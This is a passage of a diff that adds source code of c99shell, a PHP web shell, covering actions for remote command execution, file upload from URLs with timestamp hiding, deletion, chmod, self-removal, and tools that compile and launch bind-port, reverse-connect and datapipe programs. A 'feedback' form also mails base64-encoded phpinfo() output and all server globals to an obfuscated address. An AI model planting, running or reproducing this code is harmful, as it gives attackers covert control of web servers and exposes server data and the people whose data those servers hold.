size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; + echo "<center>base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} + else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} + echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; + } + echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; + $c = strlen($encoder_input); + for($i=0;$i<$c;$i++) + { + $hex = dechex(ord($encoder_input[$i])); + if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} + elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} + } + echo "\" readonly><br></center></form>"; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} + else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = true; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; + } + else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} +} +if ($act == "search") +{ + echo "<b>Search in file-system:</b><br>"; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = true; + $act = "ls"; + } + } + echo "<form method=POST> +<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> +<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp +<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text +<br><br><input type=submit name=submit value=\"Search\"></form>"; + if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} + else + { + $form = true; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = false; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> +<input type=submit name=submit value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = false; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + } + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "<b>Result of execution this command</b>:<br>"; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + @chdir($olddir); + } + else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== false) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; + $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + else + { + $type = "DIR"; + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; + if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} + else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + //Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"> + <script> + function ls_setcheckboxall(status) + { + var id = 0; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 0; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> + <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=act><option value=\"".$act."\">With selected:</option>"; + echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; + echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; + if ($usefsbuff) + { + echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; + echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; + echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; + } + echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; + echo "</form>"; + } +} +if ($act == "tools") +{ + $bndportsrcs = array( + "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), + "c99sh_bindport.c"=>array("Using C","%path %port %pass") + ); + $bcsrcs = array( + "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), + "c99sh_backconn.c"=>array("Using C","%path %host %port") + ); + $dpsrcs = array( + "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + ); + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_array($datapipe)) {$datapipe = array();} + + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + if (!empty($bindsubmit)) + { + echo "<b>Result of binding port:</b><br>"; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "Unknown file!<br>";} + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} + else + { + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind["port"],$v[1]); + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";} + } + echo "<br>"; + } + } + if (!empty($bcsubmit)) + { + echo "<b>Result of back connection:</b><br>"; + $v = $bcsrcs[$bc["src"]]; + if (empty($v)) {echo "Unknown file!<br>";} + else + { + $w = explode(".",$bc["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc["host"],$v[1]); + $v[1] = str_replace("%port",$bc["port"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = 